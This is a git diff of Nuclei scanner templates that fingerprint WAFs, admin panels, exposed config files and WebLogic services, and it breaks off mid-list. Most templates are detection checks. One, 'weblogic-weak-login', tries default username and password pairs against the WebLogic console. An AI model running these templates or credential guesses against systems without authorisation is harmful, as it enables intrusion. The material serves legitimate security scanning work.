exposure,api - reference: + reference: | - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ requests: @@ -15,24 +15,26 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" - stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" + condition: or + part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" - stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" + condition: or + part: body diff --git a/nuclei-templates/Other/waf-detect-11087.yaml b/nuclei-templates/Other/waf-detect-11087.yaml index 5eba810d3c..5399b6a26b 100644 --- a/nuclei-templates/Other/waf-detect-11087.yaml +++ b/nuclei-templates/Other/waf-detect-11087.yaml @@ -1,12 +1,10 @@ id: waf-detect - info: name: WAF Detection - author: dwisiswant0,lu4nx + author: dwisiswant0 & lu4nx severity: info reference: https://github.com/Ekultek/WhatWaf tags: waf,tech,misc - requests: - raw: - | @@ -15,14 +13,12 @@ requests: Content-Type: application/x-www-form-urlencoded _= - matchers: - type: regex name: instart regex: - '(?i)instartrequestid' part: body - - type: regex name: perimx regex: @@ -32,7 +28,6 @@ requests: - '(?i)(..)?client.perimeterx.*/[a-zA-Z]{8,15}/*.*.js' condition: or part: all - - type: regex name: webknight regex: @@ -40,7 +35,6 @@ requests: - '(?i)webknight' condition: or part: all - - type: regex name: zscaler regex: @@ -48,7 +42,6 @@ requests: - '(?i)zscaler' condition: or part: all - - type: regex name: fortigate regex: @@ -64,21 +57,18 @@ requests: - '(?i)the.page.cannot.be.displayed..please.contact.[^@]+@[^@]+\.[^@]+.for.additional.information' condition: or part: all - - type: regex name: teros regex: - '(?i)st8(id|.wa|.wf)?.?(\d+|\w+)?' condition: or part: all - - type: regex name: stricthttp regex: - '(?i)the.request.was.rejected.because.the.url.contained.a.potentially.malicious.string' condition: or part: all - - type: regex name: stricthttp regex: @@ -86,7 +76,6 @@ requests: - '(?i)/rejected.by.url.scan' condition: or part: all - - type: regex name: shadowd regex: @@ -94,7 +83,6 @@ requests: - '(?i)request.forbidden.by.administrative.rules.' condition: or part: all - - type: regex name: bigip regex: @@ -105,14 +93,12 @@ requests: - '(?i)bigipserver' condition: or part: all - - type: regex name: edgecast regex: - '(?i)\Aecdf' condition: or part: all - - type: regex name: radware regex: @@ -121,7 +107,6 @@ requests: - '(?i)with.the.following.case.number.in.its.subject:.\d+.' condition: or part: all - - type: regex name: varnish regex: @@ -131,7 +116,6 @@ requests: - '(?i).>access.is.blocked.according.to.our.site.security.policy.<+' condition: or part: all - - type: regex name: infosafe regex: @@ -141,7 +125,6 @@ requests: - '(?i)var.infosafekey=' condition: or part: all - - type: regex name: aliyundun regex: @@ -149,7 +132,6 @@ requests: - '(?i)http(s)?://(www.)?aliyun.(com|net)' condition: or part: all - - type: regex name: ats regex: @@ -157,7 +139,6 @@ requests: - '(?i)ats((\/)?(\d+(.\d+(.\d+)?)?))?' condition: or part: all - - type: regex name: malcare regex: @@ -166,19 +147,16 @@ requests: - '(?i).>firewall<.+.><.+>powered.by<.+.>(<.+.>)?(.?malcare.-.pro|blogvault)?' condition: or part: all - - type: regex name: wts regex: - '(?i)()?wts.wa(f)?(\w+(\w+(\w+)?)?)?' part: all - - type: regex name: dw regex: - '(?i)dw.inj.check' part: all - - type: regex name: denyall regex: @@ -186,7 +164,6 @@ requests: - '(?i)\Asessioncookie=' condition: or part: all - - type: regex name: yunsuo regex: @@ -194,13 +171,11 @@ requests: - '(?i)yunsuo.session' condition: or part: all - - type: regex name: litespeed regex: - '(?i)litespeed.web.server' part: all - - type: regex name: cloudfront regex: @@ -209,7 +184,6 @@ requests: - '(?i)x.amz.cf.id|nguardx' condition: or part: all - - type: regex name: anyu regex: @@ -218,7 +192,6 @@ requests: - '(?i)anyu-?.the.green.channel' condition: or part: all - - type: regex name: googlewebservices regex: @@ -227,7 +200,6 @@ requests: - '(?i)block(ed)?.by.g.cloud.security.policy.+' condition: or part: all - - type: regex name: didiyun regex: @@ -235,31 +207,26 @@ requests: - '(?i)didiyun' condition: or part: all - - type: regex name: blockdos regex: - '(?i)blockdos\.net' part: all - - type: regex name: codeigniter regex: - '(?i)the.uri.you.submitted.has.disallowed.characters' part: all - - type: regex name: stingray regex: - '(?i)\AX-Mapping-' part: all - - type: regex name: west263 regex: - '(?i)wt\d*cdn' part: all - - type: regex name: aws regex: @@ -269,7 +236,6 @@ requests: - '(?i)x.amz.request.id' condition: or part: all - - type: regex name: yundun regex: @@ -279,7 +245,6 @@ requests: - '(?i)<title>.403.forbidden:.access.is.denied.{0,2}<.{0,2}title>' condition: or part: all - - type: regex name: barracuda regex: @@ -288,13 +253,11 @@ requests: - '(?i)barracuda.networks.{1,2}inc' condition: or part: all - - type: regex name: dodenterpriseprotection regex: - '(?i)dod.enterprise.level.protection.system' part: all - - type: regex name: secupress regex: @@ -302,13 +265,11 @@ requests: - '(?i)block.id.{1,2}bad.url.contents.<.' condition: or part: all - - type: regex name: aesecure regex: - '(?i)aesecure.denied.png' part: all - - type: regex name: incapsula regex: @@ -317,7 +278,6 @@ requests: - '(?i)incapsula.incident.id' condition: or part: all - - type: regex name: nexusguard regex: @@ -325,7 +285,6 @@ requests: - '(?i)((http(s)?://)?speresources.)?nexusguard.com.wafpage' condition: or part: all - - type: regex name: cloudflare regex: @@ -339,7 +298,6 @@ requests: - '(?i)__cfduid' condition: or part: all - - type: regex name: akamai regex: @@ -348,7 +306,6 @@ requests: - '(?i)ak.bmsc.' condition: or part: all - - type: regex name: webseal regex: @@ -356,13 +313,11 @@ requests: - '(?i)webseal.server.received.an.invalid.http.request' condition: or part: all - - type: regex name: dotdefender regex: - '(?i)dotdefender.blocked.your.request' part: all - - type: regex name: pk regex: @@ -371,7 +326,6 @@ requests: - '(?i).>A.safety.critical.request.was.discovered.and.blocked.<.' condition: or part: all - - type: regex name: expressionengine regex: @@ -380,19 +334,16 @@ requests: - '(?i)invalid.(get|post).data' condition: or part: all - - type: regex name: comodo regex: - '(?i)protected.by.comodo.waf' part: all - - type: regex name: ciscoacexml regex: - '(?i)ace.xml.gateway' part: all - - type: regex name: barikode regex: @@ -400,7 +351,6 @@ requests: - '(?i)<h\d{1}>forbidden.access<.h\d{1}>' condition: or part: all - - type: regex name: watchguard regex: @@ -408,7 +358,6 @@ requests: - '(?i)watchguard(.technologies(.inc)?)?' condition: or part: all - - type: regex name: binarysec regex: @@ -417,7 +366,6 @@ requests: - '(?i)binarysec' condition: or part: all - - type: regex name: bekchy regex: @@ -425,7 +373,6 @@ requests: - '(?i)(http(s)?://)(www.)?bekchy.com(/report)?' condition: or part: all - - type: regex name: bitninja regex: @@ -434,7 +381,6 @@ requests: - '(?i).>visitor.anti(\S)?robot.validation<.' condition: or part: all - - type: regex name: apachegeneric regex: @@ -445,7 +391,6 @@ requests: - '(?i)<title>403 Forbidden' condition: or part: all - - type: regex name: greywizard regex: @@ -455,13 +400,11 @@ requests: - '(?i)grey.wizard' condition: or part: all - - type: regex name: configserver regex: - '(?i).>the.firewall.on.this.server.is.blocking.your.connection.<+' part: all - - type: regex name: viettel regex: @@ -470,7 +413,6 @@ requests: - '(?i)(http(s).//)?cloudrity.com(.vn)?' condition: or part: all - - type: regex name: safedog regex: @@ -478,13 +420,11 @@ requests: - '(?i)waf(.?\d+.?\d+)' condition: or part: all - - type: regex name: baidu regex: - '(?i)yunjiasu.nginx' part: all - - type: regex name: alertlogic regex: @@ -496,13 +436,11 @@ requests: - '(?i)page.has.either.been.removed.{1,2}renamed' condition: or part: all - - type: regex name: armor regex: - '(?i)blocked.by.website.protection.from.armour' part: all - - type: regex name: dosarrest regex: @@ -510,7 +448,6 @@ requests: - '(?i)x.dis.request.id' condition: or part: all - - type: regex name: paloalto regex: @@ -518,7 +455,6 @@ requests: - '.>Virus.Spyware.Download.Blocked<.' condition: or part: all - - type: regex name: aspgeneric regex: @@ -536,7 +472,6 @@ requests: - '(?i)\basp.net\b' condition: or part: all - - type: regex name: powerful regex: @@ -544,7 +479,6 @@ requests: - '(?i)http(s)?...tiny.cc.powerful.firewall' condition: or part: all - - type: regex name: uewaf regex: @@ -552,7 +486,6 @@ requests: - '(?i)uewaf(.deny.pages)' condition: or part: all - - type: regex name: janusec regex: @@ -560,7 +493,6 @@ requests: - '(?i)(http(s)?\W+(www.)?)?janusec.(com|net|org)' condition: or part: all - - type: regex name: siteguard regex: @@ -568,7 +500,6 @@ requests: - '(?i)refuse.to.browse' condition: or part: all - - type: regex name: sonicwall regex: @@ -580,7 +511,6 @@ requests: - '(?i).>policy.this.site.is.blocked<.' condition: or part: all - - type: regex name: jiasule regex: @@ -590,7 +520,6 @@ requests: - '(?i)(static|www|dynamic).jiasule.(com|net)' condition: or part: all - - type: regex name: nginxgeneric regex: @@ -598,7 +527,6 @@ requests: - '(?i)you.do(not|n.t)?.have.permission.to.access.this.document' condition: or part: all - - type: regex name: stackpath regex: @@ -606,13 +534,11 @@ requests: - '(?i)

    sorry,.you.have.been.blocked.?<.h2>' condition: or part: all - - type: regex name: sabre regex: - '(?i)dxsupport@sabre.com' part: all - - type: regex name: wordfence regex: @@ -621,7 +547,6 @@ requests: - '(?i).>wordfence<.' condition: or part: all - - type: regex name: '360' regex: @@ -632,14 +557,12 @@ requests: - '(?i)transfer.is.blocked' condition: or part: all - - type: regex name: asm regex: - '(?i)the.requested.url.was.rejected..please.consult.with.your.administrator.' condition: or part: all - - type: regex name: rsfirewall regex: @@ -649,7 +572,6 @@ requests: - '(?i)rsfirewall' condition: or part: all - - type: regex name: sucuri regex: @@ -659,25 +581,21 @@ requests: - '(?i)http(s)?.\/\/(cdn|supportx.)?sucuri(.net|com)?' condition: or part: all - - type: regex name: airlock regex: - '(?i)\Aal[.-]?(sess|lb)=?' part: all - - type: regex name: xuanwudun regex: - '(?i)class=.(db)?waf.?(-row.)?>' part: all - - type: regex name: chuangyudun regex: - '(?i)(http(s)?.//(www.)?)?365cyd.(com|net)' part: all - - type: regex name: securesphere regex: @@ -690,13 +608,11 @@ requests: - '(?i)contact.support.for.additional.information' condition: or part: all - - type: regex name: anquanbao regex: - '(?i).aqb_cc.error.' part: all - - type: regex name: modsecurity regex: @@ -708,7 +624,6 @@ requests: - '(?i)blocked.by.mod.security' condition: or part: all - - type: regex name: modsecurityowasp regex: @@ -716,7 +631,6 @@ requests: - '(?i)additionally\S.a.406.not.acceptable' condition: or part: all - - type: regex name: squid regex: @@ -725,7 +639,6 @@ requests: - '(?i)X.Squid.Error' condition: or part: all - - type: regex name: shieldsecurity regex: @@ -734,13 +647,11 @@ requests: - '(?i)url.{1,2}form.or.cookie.data.wasn.t.appropriate' condition: or part: all - - type: regex name: wallarm regex: - '(?i)nginix.wallarm' part: all - - type: regex part: all name: huaweicloud @@ -748,4 +659,4 @@ requests: regex: - '(?)content="CloudWAF"' - 'Server: CloudWAF' - - 'Set-Cookie: HWWAFSESID=' \ No newline at end of file + - 'Set-Cookie: HWWAFSESID=' diff --git a/nuclei-templates/Other/wago-plc-panel-11091.yaml b/nuclei-templates/Other/wago-plc-panel-11093.yaml similarity index 100% rename from nuclei-templates/Other/wago-plc-panel-11091.yaml rename to nuclei-templates/Other/wago-plc-panel-11093.yaml diff --git a/nuclei-templates/Other/wallix-accessmanager-panel-11095.yaml b/nuclei-templates/Other/wallix-accessmanager-panel-11095.yaml deleted file mode 100644 index 1e18d62f57..0000000000 --- a/nuclei-templates/Other/wallix-accessmanager-panel-11095.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: wallix-accessmanager-panel - -info: - name: Wallix Access Manager Panel - Detect - author: righettod - severity: info - description: Wallix Access Manager panel was detected. - reference: - - https://www.wallix.com/privileged-access-management/access-manager/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - metadata: - max-request: 2 - shodan-query: http.title:"Wallix Access Manager" - tags: panel,wallix - -http: - - method: GET - path: - - '{{BaseURL}}/wabam' - - '{{BaseURL}}/wabam/favicon.ico' - - stop-at-first-match: true - host-redirects: true - max-redirects: 3 - - matchers-condition: or - matchers: - - type: dsl - dsl: - - "status_code==200" - - "contains(tolower(body), 'wallix access manager')" - condition: and - - - type: dsl - dsl: - - "status_code==200" - - "('1745235488' == mmh3(base64_py(body)))" - condition: and -# digest: 490a00463044022019f1986330c602f5bc507701cc74ceebf5676bf1b40868b4ef45325740c5b24702201e76cf52ae8e567c34688463f12ad9828438e745cb79915d806733f2e3cc646d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/wallix-accessmanager-panel.yaml b/nuclei-templates/Other/wallix-accessmanager-panel.yaml new file mode 100644 index 0000000000..a114d99ba4 --- /dev/null +++ b/nuclei-templates/Other/wallix-accessmanager-panel.yaml @@ -0,0 +1,29 @@ +id: wallix-accessmanager-panel +info: + name: Wallix Access Manager Panel + author: righettod + severity: info + reference: https://www.wallix.com/privileged-access-management/access-manager/ + metadata: + shodan-query: http.title:"Wallix Access Manager" + tags: panel,wallix +requests: + - method: GET + path: + - '{{BaseURL}}/wabam' + - '{{BaseURL}}/wabam/favicon.ico' + stop-at-first-match: true + redirects: true + max-redirects: 3 + matchers-condition: or + matchers: + - type: dsl + dsl: + - "status_code==200" + - "contains(tolower(body), 'wallix access manager')" + condition: and + - type: dsl + dsl: + - "status_code==200" + - "('1745235488' == mmh3(base64_py(body)))" + condition: and diff --git a/nuclei-templates/Other/wamp-server-configuration-11096.yaml b/nuclei-templates/Other/wamp-server-configuration-11096.yaml new file mode 100644 index 0000000000..79b7682bf7 --- /dev/null +++ b/nuclei-templates/Other/wamp-server-configuration-11096.yaml @@ -0,0 +1,24 @@ +id: wamp-server-configuration + +info: + name: default-wamp-server-page + author: pussycat0x + severity: medium + description: Wamp default page will expose sensitive configuration and vhosts. + reference: https://www.exploit-db.com/ghdb/6891. + tags: wamp,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "wampserver")' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wamp-server-configuration-11099.yaml b/nuclei-templates/Other/wamp-server-configuration-11099.yaml deleted file mode 100644 index 7594ecf0de..0000000000 --- a/nuclei-templates/Other/wamp-server-configuration-11099.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wamp-server-configuration - -info: - name: default-wamp-server-page - author: pussycat0x - severity: medium - description: Wamp default page will expose sensitive configuration and vhosts. - reference: https://www.exploit-db.com/ghdb/6891. - tags: wamp,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(tolower(body), "wampserver")' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wamp-xdebug-detect-11103.yaml b/nuclei-templates/Other/wamp-xdebug-detect-11101.yaml similarity index 100% rename from nuclei-templates/Other/wamp-xdebug-detect-11103.yaml rename to nuclei-templates/Other/wamp-xdebug-detect-11101.yaml diff --git a/nuclei-templates/Other/wangkang-ns-asg-rce-1.yaml b/nuclei-templates/Other/wangkang-NS-ASG-rce-1.yaml similarity index 100% rename from nuclei-templates/Other/wangkang-ns-asg-rce-1.yaml rename to nuclei-templates/Other/wangkang-NS-ASG-rce-1.yaml diff --git a/nuclei-templates/Other/wangkang-NGFW-rce.yaml b/nuclei-templates/Other/wangkang-ngfw-rce.yaml similarity index 100% rename from nuclei-templates/Other/wangkang-NGFW-rce.yaml rename to nuclei-templates/Other/wangkang-ngfw-rce.yaml diff --git a/nuclei-templates/Other/wangkang-NS-ASG-rce-2.yaml b/nuclei-templates/Other/wangkang-ns-asg-rce-2.yaml similarity index 100% rename from nuclei-templates/Other/wangkang-NS-ASG-rce-2.yaml rename to nuclei-templates/Other/wangkang-ns-asg-rce-2.yaml diff --git a/nuclei-templates/Other/watchguard-credentials-disclosure-11107.yaml b/nuclei-templates/Other/watchguard-credentials-disclosure-11106.yaml similarity index 100% rename from nuclei-templates/Other/watchguard-credentials-disclosure-11107.yaml rename to nuclei-templates/Other/watchguard-credentials-disclosure-11106.yaml diff --git a/nuclei-templates/Other/watchguard-panel-11108.yaml b/nuclei-templates/Other/watchguard-panel-11108.yaml deleted file mode 100644 index 4144b871fe..0000000000 --- a/nuclei-templates/Other/watchguard-panel-11108.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: watchguard-panel - -info: - name: Watchguard Panel - author: ahmetpergamum - severity: info - reference: https://www.exploit-db.com/ghdb/7008 - tags: panel,watchguard - -requests: - - method: GET - path: - - '{{BaseURL}}/sslvpn_logon.shtml' - - matchers-condition: and - matchers: - - type: word - words: - - 'User Authentication' - - 'WatchGuard Technologies' - condition: or - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/watchguard-panel.yaml b/nuclei-templates/Other/watchguard-panel.yaml new file mode 100644 index 0000000000..69937922f4 --- /dev/null +++ b/nuclei-templates/Other/watchguard-panel.yaml @@ -0,0 +1,21 @@ +id: watchguard-panel +info: + name: Watchguard Panel + author: ahmetpergamum + severity: info + reference: https://www.exploit-db.com/ghdb/7008 + tags: panel,watchguard +requests: + - method: GET + path: + - '{{BaseURL}}/sslvpn_logon.shtml' + matchers-condition: and + matchers: + - type: word + words: + - '<title>User Authentication' + - 'WatchGuard Technologies' + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wazuh-detect-11111.yaml b/nuclei-templates/Other/wazuh-detect.yaml similarity index 100% rename from nuclei-templates/Other/wazuh-detect-11111.yaml rename to nuclei-templates/Other/wazuh-detect.yaml diff --git a/nuclei-templates/Other/wazuh-panel.yaml b/nuclei-templates/Other/wazuh-panel-11114.yaml similarity index 100% rename from nuclei-templates/Other/wazuh-panel.yaml rename to nuclei-templates/Other/wazuh-panel-11114.yaml diff --git a/nuclei-templates/Other/weatherlink-11115.yaml b/nuclei-templates/Other/weatherlink-11115.yaml new file mode 100644 index 0000000000..3f9d994189 --- /dev/null +++ b/nuclei-templates/Other/weatherlink-11115.yaml @@ -0,0 +1,22 @@ +id: weatherlink-configuration + +info: + name: WeatherLinkIP Configuration + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6007 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - '<title>WeatherLinkIP Configuration' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/weatherlink.yaml b/nuclei-templates/Other/weatherlink.yaml deleted file mode 100644 index 61a45448ca..0000000000 --- a/nuclei-templates/Other/weatherlink.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: weatherlink-configuration -info: - name: WeatherLinkIP Configuration - author: dhiyaneshDK - severity: info - reference: - - https://www.exploit-db.com/ghdb/6007 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - 'WeatherLinkIP Configuration' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/web-config-11124.yaml b/nuclei-templates/Other/web-config-11124.yaml deleted file mode 100644 index 7c1e1b7f62..0000000000 --- a/nuclei-templates/Other/web-config-11124.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: web-config - -info: - name: Web Config file - author: Yash Anand @yashanand155 - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}/web.config' - - matchers-condition: and - matchers: - - type: word - words: - - - - - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/web-config-11127.yaml b/nuclei-templates/Other/web-config-11127.yaml new file mode 100644 index 0000000000..d038aa19f6 --- /dev/null +++ b/nuclei-templates/Other/web-config-11127.yaml @@ -0,0 +1,19 @@ +id: web-config +info: + name: Web Config file + author: Yash Anand @yashanand155 + severity: info +requests: + - method: GET + path: + - '{{BaseURL}}/web.config' + matchers-condition: and + matchers: + - type: word + words: + - + - + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/web-ftp-detect-11136.yaml b/nuclei-templates/Other/web-ftp-detect-11136.yaml new file mode 100644 index 0000000000..03f7ce1fc3 --- /dev/null +++ b/nuclei-templates/Other/web-ftp-detect-11136.yaml @@ -0,0 +1,23 @@ +id: web-ftp-detect + +info: + name: Web FTP Detection + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/7013 + tags: webftp,tech,ftp + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" + + matchers-condition: and + matchers: + - type: word + words: + - "Web-FTP" + - "square login" + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/web-ftp-detect-11137.yaml b/nuclei-templates/Other/web-ftp-detect-11137.yaml deleted file mode 100644 index 646c4f7e98..0000000000 --- a/nuclei-templates/Other/web-ftp-detect-11137.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: web-ftp-detect -info: - name: Web FTP Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7013 - tags: webftp,tech,ftp -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" - matchers-condition: and - matchers: - - type: word - words: - - "Web-FTP" - - "square login" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/web-suite-detect-11167.yaml b/nuclei-templates/Other/web-suite-detect-11167.yaml new file mode 100644 index 0000000000..63881cf69f --- /dev/null +++ b/nuclei-templates/Other/web-suite-detect-11167.yaml @@ -0,0 +1,31 @@ +id: web-suite-detect +info: + name: Web Suite Detect + author: pikpikcu + severity: info + metadata: + fofa-query: Web Suite 2021 Login + tags: tech,web-suite +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/ws2020/" + - "{{BaseURL}}/ws2021/" + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'www.bqe.com">BQE Software Inc.' + - 'Web Suite' + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - "Version: (.*)" diff --git a/nuclei-templates/Other/web-suite-detect-11168.yaml b/nuclei-templates/Other/web-suite-detect-11168.yaml deleted file mode 100644 index 934c55ef73..0000000000 --- a/nuclei-templates/Other/web-suite-detect-11168.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: web-suite-detect - -info: - name: Web Suite Detect - author: pikpikcu - severity: info - metadata: - max-request: 3 - fofa-query: Web Suite 2021 Login - tags: tech,web-suite - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/ws2020/" - - "{{BaseURL}}/ws2021/" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'www.bqe.com">BQE Software Inc.' - - 'Web Suite' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - "Version: (.*)" - -# digest: 490a00463044022065a8b8eda90d52df964ab99090216ed3c72084aeda502c716492d820cdf18474022023236a13ebf2e8379b9f5cd4ab94222e43c9a3d09b9713c69eaa37a68a33f580:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/webeditors-11128.yaml b/nuclei-templates/Other/webeditors.yaml similarity index 100% rename from nuclei-templates/Other/webeditors-11128.yaml rename to nuclei-templates/Other/webeditors.yaml diff --git a/nuclei-templates/Other/webflow-takeover-11131.yaml b/nuclei-templates/Other/webflow-takeover-11131.yaml new file mode 100644 index 0000000000..3fd3180be6 --- /dev/null +++ b/nuclei-templates/Other/webflow-takeover-11131.yaml @@ -0,0 +1,15 @@ +id: webflow-takeover +info: + name: webflow takeover detection + author: pdcommunity + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + -

    The page you are looking for doesn't exist or has been moved.

    diff --git a/nuclei-templates/Other/webflow-takeover-11133.yaml b/nuclei-templates/Other/webflow-takeover-11133.yaml deleted file mode 100644 index b1667b35dc..0000000000 --- a/nuclei-templates/Other/webflow-takeover-11133.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: webflow-takeover -info: - name: webflow takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - -

    The page you are looking for doesn't exist or has been moved.

    diff --git a/nuclei-templates/Other/weblogic-detect-11142.yaml b/nuclei-templates/Other/weblogic-detect-11142.yaml deleted file mode 100644 index 23f46a01a8..0000000000 --- a/nuclei-templates/Other/weblogic-detect-11142.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: weblogic-detect -info: - name: Detect Weblogic - author: pdteam - severity: info - tags: tech,weblogic - metadata: - shodan-query: product:"Oracle Weblogic" -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - matchers-condition: and - matchers: - - type: word - words: - - "From RFC 2068" - - "Error 404--Not Found" - condition: and - - type: status - status: - - 404 diff --git a/nuclei-templates/Other/weblogic-detect-11144.yaml b/nuclei-templates/Other/weblogic-detect-11144.yaml new file mode 100644 index 0000000000..fa768308b0 --- /dev/null +++ b/nuclei-templates/Other/weblogic-detect-11144.yaml @@ -0,0 +1,26 @@ +id: weblogic-detect + +info: + name: Detect Weblogic + author: pdteam + severity: info + tags: tech,weblogic + metadata: + shodan-query: product:"Oracle Weblogic" + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + - type: word + words: + - "From RFC 2068" + - "Error 404--Not Found" + condition: and + + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/weblogic-login-11149.yaml b/nuclei-templates/Other/weblogic-login-11149.yaml new file mode 100644 index 0000000000..39a4fb59f8 --- /dev/null +++ b/nuclei-templates/Other/weblogic-login-11149.yaml @@ -0,0 +1,30 @@ +id: weblogic-login + +info: + name: Weblogic Login Panel + author: bing0o,meme-lord + severity: info + tags: panel,oracle,weblogic,login + metadata: + shodan-query: product:"Oracle Weblogic" + +requests: + - method: GET + path: + - "{{BaseURL}}/console/login/LoginForm.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - "WebLogic" + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - 'WebLogic Server Version: (.*?)<' diff --git a/nuclei-templates/Other/weblogic-login.yaml b/nuclei-templates/Other/weblogic-login.yaml deleted file mode 100644 index cf4321fc1f..0000000000 --- a/nuclei-templates/Other/weblogic-login.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: weblogic-login -info: - name: Weblogic Login Panel - author: bing0o,meme-lord - severity: info - tags: panel,oracle,weblogic,login - metadata: - shodan-query: product:"Oracle Weblogic" -requests: - - method: GET - path: - - "{{BaseURL}}/console/login/LoginForm.jsp" - matchers-condition: and - matchers: - - type: word - words: - - "WebLogic" - - type: status - status: - - 200 - extractors: - - type: regex - group: 1 - regex: - - 'WebLogic Server Version: (.*?)<' diff --git a/nuclei-templates/Other/weblogic-t3-detect-11152.yaml b/nuclei-templates/Other/weblogic-t3-detect-11152.yaml deleted file mode 100644 index b1a63e30be..0000000000 --- a/nuclei-templates/Other/weblogic-t3-detect-11152.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: weblogic-t3-detect -info: - name: Detect Weblogic T3 Protocol - author: F1tz - severity: info - description: Check T3 protocol status. - tags: network,weblogic -network: - - inputs: - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" - host: - - "{{Hostname}}" - read-size: 1024 - matchers: - - type: word - words: - - "HELO" diff --git a/nuclei-templates/Other/weblogic-t3-detect.yaml b/nuclei-templates/Other/weblogic-t3-detect.yaml new file mode 100644 index 0000000000..fd503f75f3 --- /dev/null +++ b/nuclei-templates/Other/weblogic-t3-detect.yaml @@ -0,0 +1,38 @@ +id: weblogic-t3-detect +info: + name: Detect Weblogic T3 Protocol + author: F1tz,milo2012,wdahlenb + severity: info + description: Check T3 protocol status. + tags: network,weblogic +network: + - inputs: + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + host: + - "{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" + - inputs: + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + host: + - "tls://{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" diff --git a/nuclei-templates/Other/weblogic-weak-login-11154.yaml b/nuclei-templates/Other/weblogic-weak-login-11154.yaml new file mode 100644 index 0000000000..454abb185f --- /dev/null +++ b/nuclei-templates/Other/weblogic-weak-login-11154.yaml @@ -0,0 +1,51 @@ +id: weblogic-weak-login +info: + name: WebLogic weak login + author: pdteam + severity: high + tags: default-login,weblogic + reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password +requests: + - raw: + - | + GET /console/ HTTP/1.1 + Host: {{Hostname}} + - | + POST /console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 + attack: pitchfork + payloads: + username: + - weblogic + - weblogic + - weblogic + - weblogic + - weblogic + - admin + - admin + - system + password: + - weblogic + - weblogic1 + - welcome1 + - Oracle@123 + - 